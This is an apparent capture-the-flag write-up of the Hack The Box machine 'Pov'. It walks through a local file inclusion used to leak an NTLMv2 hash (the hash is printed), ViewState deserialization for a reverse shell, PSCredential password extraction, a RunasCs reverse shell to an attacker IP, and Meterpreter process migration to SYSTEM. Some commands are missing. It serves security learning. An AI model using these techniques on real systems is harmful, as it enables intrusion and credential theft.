IP: 10.10.11.251 - Platform: Windows - Difficulty: Medium
RECON
Nmap
nmap reveals that only port 80 is open. That is kinda strange for a typical machine seen on HTB. Most of the boxes tend to open port 22 (or commonly refer as SSH) as a way to remote access as user or root. The usual approach would be to grab the creds through some nefarious ways then log in SSH creds.
map -sV -sC -v -T4 10.10.11.251
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: E9B5E66DEBD9405ED864CAC17E2A888E
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
FFUF
Using ffuf to search for subdomains that respond different with code 200/300
Only 1 subdomain returns 302 - dev. Let add it into /etc/hosts.
GAINING FOOTHOLD
pov.htb provides no indication of a possible attack vector. However, in dev.pov.htb, I stumbled upon LFI (Local File Incursion) when examining the parameters in the intercepted package in Burpsuite while tinkering with the web download function.
File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead to:
Code execution on the web server
Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)
Denial of Service (DoS)
Sensitive Information Disclosure
It took some time to find a few intriguing files:
default.aspx
web.config
contact.aspx
LFI & Responder
Now what we are going to do here is we are going to capture the NTLM hash by using Responder
Responder will poison MDNS, NBT-NS, and LLMNR.
And you might be asking?
What is LLMNR, NBT-NS, MDNS?
The functions of the protocols LLMNR, NBT-NS, and MDNS are nearly identical.
Based on the Domain Name System packet format, LLMNR (Link-Local Multicast Name Resolution) is a protocol that supports all current and upcoming DNS formats, types, and classes and permits IPv4 and IPv6 hosts.
A Net BIOS protocol called NBT-NS (Net BIOS Name Service) is used on Windows OS to convert NetBIOS names to IP addresses.
Finally, all of the network's participants are addressed directly via the MDNS (Multicast Domain Name Service) protocol.
If reading this is too tedious for you, just know that, Responder would attempt to obtain your NTLM hashes from the network in plain text. If you're lucky, this tool might give you a clear text username and password in addition to the password hash.
file=%5C%5C10.10.X.X%5Csomefile
Our payload basically is \\10.10.X.X\somefile wrap in URL encoding.
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.36]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-71DF2WLMSKI]
Responder Domain Name [4SLY.LOCAL]
Responder DCE-RPC Port [45254]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.251
[SMB] NTLMv2-SSP Username : POV\sfitz
[SMB] NTLMv2-SSP Hash : sfitz::POV:b278d4805eceb79a:EF1631875F43CC4ED3C17B5CDC1F7A2C:0101000000000000000D8D632353DA01450CA76A8DE1A6B50000000002000800340053004C00590001001E00570049004E002D003700310044004600320057004C004D0053004B00490004003400570049004E002D003700310044004600320057004C004D0053004B0049002E00340053004C0059002E004C004F00430041004C0003001400340053004C0059002E004C004F00430041004C0005001400340053004C0059002E004C004F00430041004C0007000800000D8D632353DA0106000400020000000800300030000000000000000000000000200000B88F093AADA8A3DF9CD6AEC53146F0CE440FC2D95BEFB24CF577D47A1108E1920A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00330036000000000000000000
And this is the dead end because this hash is uncrackable. :<
ViewState Deserialization Exploit
An overview of the approach
So let's talk about ViewState for a little bit:
The ASP.NET framework's default method for maintaining page and control values across web pages is called ViewState. The current state of the page and any values that must be kept during postback are serialized into base64-encoded strings and output in the ViewState hidden field or fields when the HTML for the page is rendered.
Because of its connection to the way ASP.NET handles ViewState creation and processing through the use of the ObjectStateFormatter for serialization and deserialization, ViewState by itself isn't a problem; rather, ASP.NET's encryption and signature for serialized data could be compromised.
Attackers could create malicious payloads that imitate authentic ViewState by taking advantage of deserialization flaws in ObjectStateFormatter, thanks to exposed algorithms or keys.
-> In this case, we could leverage the leak of encryption and signature keys obtained from web.config file.
Cracking the nut
With ASP.NET framework ≥ 4.5, we need to supply the decryption algorithm and the decryption key to the ysoserial:
In this example, we will be using a simple PowerShell Reverse Shell encoded in Base64:
Finally, after replacing the URL encoded value of the generated payload with the value of the __VIEWSTATE in the above-mentioned request, our payload will be executed.
Now, we have gained a shell as POV\sfitz
PRIVILEGE ESCALATION
Enumeration
Getting users SID:
PS C:\windows\system32\inetsrv> wmic useraccount get name,sid
wmic useraccount get name,sid
Name SID
Administrator S-1-5-21-2506154456-4081221362-271687478-500
alaading S-1-5-21-2506154456-4081221362-271687478-1001
DefaultAccount S-1-5-21-2506154456-4081221362-271687478-503
Guest S-1-5-21-2506154456-4081221362-271687478-501
sfitz S-1-5-21-2506154456-4081221362-271687478-1000
WDAGUtilityAccount S-1-5-21-2506154456-4081221362-271687478-504
So sfitzlacks the privilege to receive the user flag; perhaps alaadingdoes?
After a bit of exploring, I find this file:
Password, Pa$$w0rd, P455w0rd!!!
Can I access the password directly from the PSCredential object?
As you can see, it’s stored as a secure string.
The password will not be returned to you in plain text by $cred.Password.
As opposed to a password in plain text, $cred.Password|Convertfrom-SecureString will ONLY provide you with cipher data.
The GetNetworkCredential() method is a feature of the PSCredential object. This technique can be used to decrypt the password stored in the PSCredential object.
When I invoke this method and do Get-Member, it will show you the properties of the object and you will find a property called Password. Use the command $cred.GetNetworkCredential().Passwordand it will return the password in plain text.
PS C:\Users\alaading> whoami
pov\alaading
PS C:\Users\alaading> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Understanding about SeDebugPrivilege
By itself, SeDebugPrivilege gives a process the ability to view and modify the memory of other processes. Regardless of security descriptors, SeDebugPrivilege grants the token bearer access to any process or thread.
It's important to remember that attackers frequently enable this privilege in order to gain greater access to thread and process objects. Many C2 agents come with built-in code that allows you to do this instantly.
Because it allows the creation of new remote threads in a target process, malware also takes advantage of this privilege to perform code injection into otherwise trustworthy processes.
RunasCs is a tool that allows you to use explicit credentials to run particular processes with permissions different from what our shell current provides.
As you can see below, RunasCs enables a list of privileges for a specific security token.
PS C:\Users\alaading> .\RunasCs.exe alaading f8g**********1m3 cmd.exe -r 10.10.X.X:7777 --bypass-uac
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-78c62$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 1480 created in background.
Catch it with nc:
Checking on the privilege info reveals suprising discovery:
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
C:\Windows\system32>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
With SeDebugPrivilegeenabled, we can upload a Meterpreter shell to the machine and gain leverage access as Administrator.
Now, one of the oldest tricks on the book is to migrate into another Windows processes:
There are many cases where you need to "migrate" a specific Windows working process, typically a shell.
An unstable shell.
Migrate from a 32-bit process to a 64-bit process.
Dealing with exploits require an interactive session.
This can be easily completed if you have a Meterpreter shell. All you have to do is wait for process migration to occur after launching the "migrate" command with the PID specified. In technical terms, by creating a thread inside another process, this is more of a malicious code injection than a true migration, and Meterpreter is exceptional at doing this. It creates a new remote thread and injects your current session into it, along with all of your loaded extensions and configurations.
By migrating into a more privileged process, we should be able to gain NT AUTHRITY:
Lastly, take the PID and let Meterpreter handle everything:
(Meterpreter 5)(C:\Windows\system32) > migrate 340
[*] Migrating from 552 to 340...
[*] Migration completed successfully.
(Meterpreter 5)(C:\Windows\system32) > shell
Process 4196 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0899-6CAF
Directory of C:\Users\Administrator\Desktop
01/15/2024 04:11 AM <DIR> .
01/15/2024 04:11 AM <DIR> ..
01/29/2024 10:53 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,227,570,688 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
441fb********************3f76ce1
It is also possible to migrate into winlogon, explorer
Luckily, the .NET deserialization tool includes a ViewState-specific feature. Vulnerabilities in ObjectStateFormatter deserialization are caused by its use of known keys and algorithms to impersonate ViewState encryption and signatures.
As we could see on this machine, alaadingdoes not haveSeDebugPrivilege enabled. So, to bypass this, we could import .
Avada Kedavra
There is a port open for localhost, so another possible approach is to port forwarding by using then (or Cobalt Strike, Sliver, Havoc C2)
